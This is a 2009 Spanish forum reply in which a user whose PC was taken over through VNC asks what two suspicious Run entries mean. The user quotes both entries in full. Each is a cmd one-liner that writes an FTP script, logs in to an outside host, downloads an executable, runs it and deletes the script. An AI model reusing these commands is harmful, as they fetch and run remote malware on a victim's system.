Ver Mensaje Individual
  #4 (permalink)  
Antiguo 27/04/2009, 16:37
eltronodejudas
 
Fecha de Ingreso: abril-2009
Mensajes: 2
Antigüedad: 15 años
Puntos: 0
Respuesta: equipo entra constantemente a cmd (dos)

Cita:
Iniciado por BlogInn Ver Mensaje
Si estas usando VNC acuerdate de desactivarlo o ponerle contraseña, yo no tenia la costumbre de hacerlo y un dia empecé a ver carpetas que yo no habia creado en mi escritorio y otro dia vi que mi cursor se empezaba a mover, alguien se habia colado en mi ordenador por el VNC dejé un poco que hiciera para ver que queria de mi ordenador, se bajó un programa, se puso a descomprimirlo, y era un mail sender, justo cuando iba a darle al START para empezar a Spammear movia el raton y no le dejaba, hasta que cuando me cansé apagué el VNC y listo, desde ese dia no se me abre ninguna carpeta ni ninguna ventana de ms-dos sin yo quererlo :)
a ver si me podeis ayudar!!!

no se si sabras que puede significar esto:

cmd /c echo OPEN 86.xxx.xx.xxx 21>x&echo USER hak>>x&echo hak>>x&echo GET "ies.exe">>x&echo QUIT>>x&FTP -n -s:x&"ies.exe"&del x&exit

o esto otro

cmd /c echo OPEN pitball.no-ip.org 21>x&echo USER hak>>x&echo hak>>x&echo GET "vnc-v1.9.exe">>x&echo QUIT>>x&FTP -n -s:x&"vnc-v1.9.exe"&del x&exit

te comento, hace 2 dias instale el vnc y abri el puerto 5900 para manejar mi ordenador desde otro ordenador remoto a traves de internet, cual fue mi sorpresa!? que hace un rato e visto el simbolo de vnc en negro que significa que esta alguien coenctado a vnc y eso que le puse un pass de 17 digitos!! el muy cabr...n me a desinstalado el antivirus, ya lo e vuelto a instalar y en ejecutar tengo estas dos entradas que te escribi arriba... sabes que puede ser? la ip la borro porq es la mia aunq es dinamica y me la cambia cada vez q apago el ruter cosa q ya e echo!